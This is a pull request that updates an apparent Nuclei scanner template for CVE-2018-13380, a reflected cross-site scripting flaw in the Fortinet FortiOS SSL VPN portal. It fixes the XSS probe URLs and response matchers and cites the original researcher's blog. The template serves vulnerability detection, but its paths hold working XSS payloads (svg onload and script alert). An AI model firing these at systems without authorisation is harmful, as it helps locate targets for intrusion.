### PR TITLE
Update CVE-2018-13380.yaml

### DIFF
--- a/cves/2018/CVE-2018-13380.yaml
+++ b/cves/2018/CVE-2018-13380.yaml
@@ -5,7 +5,9 @@ info:
   author: shelld3v
   severity: medium
   description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
-  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
+    - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
   tags: cve,cve2018,fortios,xss,fortinet
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -16,7 +18,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
+      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
       - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
 
     matchers-condition: and
@@ -24,7 +26,9 @@ requests:
       - type: word
         words:
           - "<svg/onload=alert(1337)>"
+          - "<script>alert(1337)</script>"
         part: body
+        condition: or
 
       - type: word
         words:

--- a/cves/2018/CVE-2018-13380.yaml
+++ b/cves/2018/CVE-2018-13380.yaml
@@ -2,18 +2,18 @@ id: CVE-2018-13380
 
 info:
   name: Fortinet FortiOS Cross-Site Scripting
-  author: shelld3v
+  author: shelld3v,AaronChen0
   severity: medium
   description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
     - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
-  tags: cve,cve2018,fortios,xss,fortinet
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.10
     cve-id: CVE-2018-13380
     cwe-id: CWE-79
+  tags: cve,cve2018,fortios,xss,fortinet
 
 requests:
   - method: GET
@@ -24,16 +24,16 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "<svg/onload=alert(1337)>"
           - "<script>alert(1337)</script>"
-        part: body
         condition: or
 
       - type: word
+        part: header
         words:
           - "application/json"
-        part: header
         negative: true
 
       - type: status


### PR DESCRIPTION
* Fix payload and matcher
* Add reference

According to Orange Tsai's blog (https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html#:~:text=CVE%2D2018%2D13380%3A%20Pre%2Dauth%20XSS), there is a semicolon in the third path "/message?title=x&msg=%26%23<svg/onload=alert(1)>;". During my testing to a vulnerable site, only with semicolon nuclei would report vulnerable. 

And there should be two seperate matchers, one for svg tag, one for script tag.